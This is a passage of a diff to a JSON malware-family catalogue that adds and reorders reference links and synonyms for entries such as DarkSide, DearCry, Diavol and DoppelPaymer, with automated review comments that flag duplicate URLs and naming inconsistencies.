+ "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
+ "https://www.varonis.com/blog/darkside-ransomware/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+
"https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
+ "https://www.databreaches.net/a-chat-with-darkside/",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a",
+ "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
 "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://unit42.paloaltonetworks.com/darkside-ransomware/",
+ "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/",
+ "http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside",
+ "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/",
+
"https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
 "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968",
- "https://www.acronis.com/en-us/articles/darkside-ransomware/"
+ "https://blog.group-ib.com/blackmatter#",
+ "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/",
+ "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/",
+ "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-131a",
+ "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
+ "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
+ "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/",
+
"https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/",
+ "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://twitter.com/sysopfb/status/1422280887274639375",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/",
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
+ "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/",
+ "https://www.acronis.com/en-us/articles/darkside-ransomware/",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://www.secjuice.com/blue-team-detection-darkside-ransomware/",
+ "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
+ "https://community.riskiq.com/article/fdf74f23",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+
"https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/",
+ "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html"
+ ],
+ "synonyms": [
+ "BlackMatter"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "625bcba0-faab-468e-b5ab-61116cb1b5cf",
- "value": "DarkSide"
+ "value": "DarkSide (Windows)"
 },
 {
 "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.",
@@ -13151,6 +15151,21 @@
 "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b",
 "value": "Daserf"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator",
+ "https://blog.reversinglabs.com/blog/data-exfiltrator"
+ ],
+ "synonyms": [
+ "FileSender"
+ ],
+ "type": []
+ },
+ "uuid": "96d727c3-bac6-4c7e-8868-b7237df55ecd",
+ "value": "DataExfiltrator"
+ },
 {
 "description": "",
 "meta": {
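Review bot: The rebuilt DarkSide `refs` array lists the same page twice under two schemes, `http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/` and `https://chuongdong.com/...`, and the CrowdStrike sprite-spider post both plain and with `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout` appended; the `http://` and tracking-parameter variants should be dropped, and `https://blog.group-ib.com/blackmatter#` carries an empty fragment. `"BlackMatter"` is added as a synonym, yet several of the new references (Recorded Future's "blackmatter-ransomware-successor-darkside-revil", BleepingComputer's "darkside-ransomware-gang-returns-as-new-blackmatter-operation") present it as a successor operation rather than another name for this family; if consumers read `synonyms` as strict equivalence, a separate entry related to this one may be the more precise model, though that depends on how the upstream source classifies it. The `docs.google.com/spreadsheets/...` link noted for Cuba is added here as well. This hunk starts at -13051 on line 184 and is reviewed as a whole here.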
@@ -13179,7 +15194,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader",
 "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html",
 "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands",
- "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/"
+ "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader"
 ],
 "synonyms": [
 "ModiLoader",
@@ -13196,7 +15212,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat",
 "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html",
- "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html",
+ "https://www.youtube.com/watch?v=ElqmQDySy48"
 ],
 "synonyms": [
 "DarkCrystal RAT"
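Review bot: The added `"https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader"` in the -13179 hunk duplicates the first entry of the same `refs` array, so the new line should be dropped. If this file is generated from Malpedia, a dedupe pass over each `refs` array before emitting would stop this recurring; the DoppelPaymer hunk at -13776 shows several near-duplicates of the same kind that differ only in scheme or trailing slash.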
@@ -13235,6 +15253,41 @@
 "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2",
 "value": "DDKONG"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply",
+ "https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4f32b912-59a9-4dae-9118-28d78e01fbfc",
+ "value": "DealPly"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b",
+ "https://www.youtube.com/watch?v=qmCjtigVVR0",
+ "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf",
+ "https://www.youtube.com/watch?v=Hhx9Q2i7zGo",
+ "https://www.youtube.com/watch?v=MRTdGUy1lfw",
+ "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/"
+ ],
+ "synonyms": [
+ "DoejoCrypt"
+ ],
+ "type": []
+ },
+ "uuid": "793f0f9d-fc1c-43e1-9010-2052a1cf696d",
+ "value": "dearcry"
+ },
 {
 "description": "Also known as Wacatac ransomware due to its .wctc extension.",
 "meta": {
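Review bot: The new DearCry entry uses `"value": "dearcry"` in lowercase, unlike the neighbouring values (`DDKONG`, `DealPly`, `DeepRAT`) and the casing in its own reference `DearCry_Ransomware.pdf`; `"value": "DearCry"` would follow the file's convention and avoid a case-only mismatch for consumers that match on `value`. Four of its nine references are bare YouTube links, which give a later reader no indication of what each covers; where a written analysis exists it is the more useful citation.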
@@ -13271,6 +15324,19 @@
 "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
 "value": "Decebal"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deep_rat",
+ "https://twitter.com/benkow_/status/1415797114794397701"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "355ace5a-ae57-45b8-b49d-e3286c4c18cc",
+ "value": "DeepRAT"
+ },
 {
 "description": "Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.\r\n\r\nThe distribution of Defray has several notable characteristics:\r\nAccording to Proofpoint:\r\n\"\r\nDefray is currently being spread via Microsoft Word document attachments in email\r\nThe campaigns are as small as several messages each\r\nThe lures are custom crafted to appeal to the intended set of potential victims\r\nThe recipients are individuals or distribution lists, e.g., group@ and websupport@\r\nGeographic targeting is in the UK and US\r\nVertical targeting varies by campaign and is narrow and selective\r\n\"",
 "meta": {
@@ -13384,6 +15450,7 @@
 "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
 "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
 "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
@@ -13402,7 +15469,7 @@
 "type": []
 },
 "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5",
- "value": "Derusbi"
+ "value": "Derusbi (Windows)"
 },
 {
 "description": "",
@@ -13468,21 +15535,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
 "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
- "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/",
- "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://securelist.com/cis-ransomware/104452/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/",
 "https://www.group-ib.com/media/iran-cybercriminals/",
+ "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une",
+ "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.acronis.com/en-us/articles/Dharma-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.youtube.com/watch?v=LUxOcpIRxmg",
 "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/",
-
"https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
+ "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://twitter.com/JakubKroustek/status/1087808550309675009",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/"
 ],
 "synonyms": [
 "Arena",
@@ -13500,6 +15574,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox",
+ "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF",
 "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
 "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/",
 "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
@@ -13517,11 +15592,30 @@
 "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665",
 "value": "DiamondFox"
 },
+ {
+ "description": "A ransomware with potential ties to Wizard Spider.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol",
+ "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/",
+ "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/",
+ "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/",
+ "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6fa944af-3def-437a-8a52-9234782b5bb8",
+ "value": "Diavol"
+ },
 {
 "description": "APT10's fork of the (open-source) Quasar RAT.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html"
 ],
 "synonyms": [],
@@ -13556,6 +15650,21 @@
 "uuid": "61b2dd12-2381-429d-bb64-e3210804a462",
 "value": "DirCrypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-3/",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-1/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9f324aaf-a54e-4532-bfc1-b23f1a77abbf",
+ "value": "DirtyMoe"
+ },
 {
 "description": "",
 "meta": {
@@ -13603,6 +15712,7 @@
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
 "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
 "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
 "https://malwareindepth.com/shamoon-2012/",
@@ -13726,6 +15836,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage",
 "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
 "https://www.us-cert.gov/ncas/alerts/AA19-024A",
 "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
 "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
@@ -13776,44 +15887,78 @@
 "uuid": "d713f337-b9c7-406d-88e4-3352b2523c73",
 "value": "donut_injector"
 },
+ {
+ "description": "DoppelDridex is a fork of Indrik Spider's Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex",
+ "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b634a2ac-da01-43c0-b823-a235497a10a8",
+ "value": "DoppelDridex"
+ },
 {
 "description": "Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled.
It also creates a note file named: \".how2decrypt.txt\".",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer",
+ "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
 "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
 "https://sites.temple.edu/care/ci-rw-attacks/",
 "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
 "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
 "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
 "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
 "https://techcrunch.com/2020/03/01/visser-breach/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
 "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
 "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
+ "https://twitter.com/vikas891/status/1385306823662587905",
 "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
 "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
 "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
 "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
 "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
 "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
 "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
 "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
 "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
 "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/"
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html"
+ ],
+ "synonyms": [
+ "Pay OR Grief"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "16a76dcf-92cb-4371-8440-d6b3adbb081b",
@@ -13864,6 +16009,19 @@
 "uuid": "fc63c3ea-23ed-448d-9d66-3fb87ebea4ba",
 "value": "Dot Ransomware"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback",
+ "https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1cda1810-f705-4d6b-9c9e-f509f8c7f5c5",
+ "value": "DOUBLEBACK"
+ },
 {
 "description": "",
 "meta": {
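Review bot: The DoppelPaymer `refs` array in the -13776 hunk now holds several near-duplicates: `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1` (added) beside the existing `.../part-1/`, `https://www.secureworks.com/research/threat-profiles/gold-heron` removed and re-added plus `http://www.secureworks.com/research/threat-profiles/gold-heron` added, and the `cisoclub.ru` report both directly and via `web.archive.org` (the archive copy may be deliberate, but then the live link is redundant). Normalising scheme and trailing slash before deduplicating would catch the first two. In the new DoppelDridex entry at the top of the hunk (line 197), the Fortinet URL carries a `?&web_view=true` tracking suffix that should be stripped.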
@@ -13887,6 +16045,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar",
 "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit",
 "https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
 "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
 ],
 "synonyms": [],
@@ -13902,6 +16061,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph",
 "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
 "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/",
 "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
 ],
 "synonyms": [
@@ -14007,62 +16167,92 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
 "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf",
 "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
